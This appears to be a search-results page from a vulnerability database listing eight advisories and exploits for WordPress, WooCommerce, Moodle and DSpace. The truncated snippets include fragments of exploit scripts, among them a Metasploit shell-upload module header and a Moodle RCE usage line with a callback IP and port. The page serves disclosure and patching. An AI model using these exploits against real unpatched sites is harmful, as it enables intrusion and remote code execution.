8 matches found
JSPUI's controlled vocabulary feature vulnerable to Open Redirect before v6.4 and v5.11
Impact: The JSPUI controlled vocabulary servlet is vulnerable to an open redirect attack, where an attacker can craft a malicious URL that looks like a legitimate DSpace/repository URL. When that URL is clicked by the target, it redirects them to a site of the attacker's choice. This vulnerability...
WordPress 5.0.0 Remote Code Execution
Exploit Title: WordPress 5.0.0 - Image Remote Code Execution Date: 2020-02-01 Exploit Authors: OUSSAMA RAHALI aka V0lck3r Discovery Author : RIPSTECH Technology Version: WordPress 5.0.0 and :/ ' printusage url = sys.argv1 username = sys.argv2 password = sys.argv3 wptheme = sys.argv4 wpscan result...
WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Crop-image Shell Upload', 'Description' = %q This module exploits a path traversal and a local file inclusion vulnerability on WordPres...
Moodle 3.4.1 - Remote Code Execution Exploit
Exploit for php platform in category web applications php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the...
WordPress 5.1 CSRF leads to remote command execution: vulnerability alert
Report number: B6-2019-031301. Report source: 360-CERT. Report author: 360-CERT. Update date: 2019-03-13. 0x00 Vulnerability background: On 2019-03-13, 360-CERT observed that RIPSTECH had released the details of a WordPress 5.1 CSRF vulnerability that leads to remote code execution...
WordPress WooCommerce plugin <= 3.5.0 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability
Authenticated Stored Cross-Site Scripting (XSS) vulnerability found by Ripstech in WordPress WooCommerce plugin versions <= 3.5.0. Solution: Update the WordPress WooCommerce plugin to the latest available version (at least 3.5.1)...
WordPress WP Job Manager plugin <= 1.31.2 - Phar Deserialization vulnerability
Phar Deserialization vulnerability found by Ripstech in WordPress WP Job Manager plugin versions <= 1.31.2. Solution: Update the WordPress WP Job Manager plugin to the latest available version (at least 1.31.3)...
WordPress <=4.9.6 - Arbitrary Code Execution vulnerability
Arbitrary Code Execution vulnerability found by ripstech in WordPress versions <=4.9.6. Solution: A new version, v4.9.7, including a patch has been released. Please update to version 4.9.7...